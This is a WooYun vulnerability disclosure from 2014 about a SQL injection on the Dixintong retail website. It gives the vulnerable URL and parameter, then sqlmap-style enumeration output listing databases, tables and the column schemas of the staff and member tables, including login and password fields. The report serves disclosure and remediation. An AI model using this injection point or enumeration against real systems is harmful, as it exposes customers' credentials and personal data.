乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-07-11: 积极联系厂商并且等待厂商认领中,细节不对外公开 2014-10-09: 厂商已经主动忽略漏洞,细节向公众公开
百度百家67期(昨天)争鸣说道,迪信通转型成功吗?这不,刚上市,就有这么大一个漏洞。
注入点:
http://www.dixintong.com/activityshow.aspx?aId=660
database:
available databases [9]:[*] crm[*] dixintong[*] master[*] model[*] msdb[*] official[*] tempdb[*] wxcrm[*] xnyycrm
看几张表就知道了
Database: dixintong[50 tables]+----------------------------+| dbo.Account || dbo.AccountAddr || dbo.AccountBasics || dbo.AccountCash || dbo.AccountFavor || dbo.AccountMess || dbo.AccountMessItem || dbo.AccountSafe || dbo.AccountSubscribe || dbo.DictArea1 || dbo.DictArea2 || dbo.DictArea3 || dbo.DictCateX || dbo.DictCourse || dbo.Product || dbo.ProductAssess || dbo.ProductAssrep || dbo.ProductAttrItem || dbo.ProductFlag || dbo.ProductImage || dbo.ProductMobile || dbo.ProductMobileRatio || dbo.ProductNote || dbo.ProductNoteTemp || dbo.ProductPrice || dbo.ProductStatus || dbo.ProductSuburb || dbo.ProductTemp || dbo.ProductTempItem || dbo.SaleOrder || dbo.SaleOrderItem || dbo.SaleOrderShare || dbo.SaleOrderStatus || dbo.Staff || dbo.SysChannel || dbo.SysMail || dbo.SysMailTemp || dbo.SysPower || dbo.SysRole || dbo.SysRolePower || dbo.SysStatistics || dbo.SysUser || dbo.SysUserRole || dbo.V_AccountFavor || dbo.V_AccountMess || dbo.V_PersonlAccountReport || dbo.V_Product || dbo.V_ProductPrice || dbo.V_SaleOrder || dbo.V_SaleOrderItemReport |+----------------------------+
Database: dixintongTable: dbo.Staff[7 columns]+------------+----------+| Column | Type |+------------+----------+| Area | nvarchar || Company | nvarchar || CreateTime | datetime || SoreName | nvarchar || StaffCode | nvarchar || StaffName | nvarchar || SysNo | int |+------------+----------+
Database: crm[59 tables]+----------------------------+| dbo.AdminNav || dbo.Article || dbo.ArticleClass || dbo.BrandInfo || dbo.BugerInfo || dbo.Company || dbo.CompanyProduct || dbo.Dispose || dbo.EOrderMem || dbo.HistoryCompanyProduct || dbo.HistoryProduct || dbo.ProCPU || dbo.ProColor || dbo.ProDB || dbo.ProDjms || dbo.ProFbl || dbo.ProMemory || dbo.ProOperator || dbo.ProPlatform || dbo.ProPmcc || dbo.ProPmcz || dbo.ProSxtpx || dbo.ProSystem || dbo.ProTypeInfo || dbo.ProWlpl || dbo.ProWlzs || dbo.ProXsmd || dbo.Product || dbo.ProductClass || dbo.Reservation || dbo.Role || dbo.SysUser || dbo.SystemLog || dbo.View_Article || dbo.View_CompanyProduct || dbo.View_Orders || dbo.View_Product || dbo.View_QuestionAndAnswer || dbo.View_contractProduct || dbo.View_mdztorder || dbo.View_questionnaire || dbo.activity || dbo.answer || dbo.comtowxgroups || dbo.contractProduct || dbo.greentravel || dbo.mdztorders || dbo.member || dbo.message || dbo.mount || dbo.orders || dbo.orderstate || dbo.question || dbo.questionnaire || dbo.sqlmapoutput || dbo.staffinfo || dbo.storeType || dbo.storefront || dbo.wxhuodong |+----------------------------+
用户信息table
Database: crmTable: dbo.member[22 columns]+----------------+----------+| Column | Type |+----------------+----------+| address | varchar || addtime | datetime || area | varchar || city | varchar || Email | varchar || Id | int || integral | int || IsOldmem | int || isOpen | int || lastLogIp | varchar || lasttime | datetime || loginName | varchar || loginPwd | varchar || logNum | int || memberCode | varchar || mlevel | varchar || nickname | varchar || productPicture | varchar || province | varchar || QQ | varchar || tel | varchar || weixin | varchar |+----------------+----------+
看看上面的各种表吧。所有信息都出来了。赶快修复吧。建议对网站进行一次渗透测试。
未能联系到厂商或者厂商积极拒绝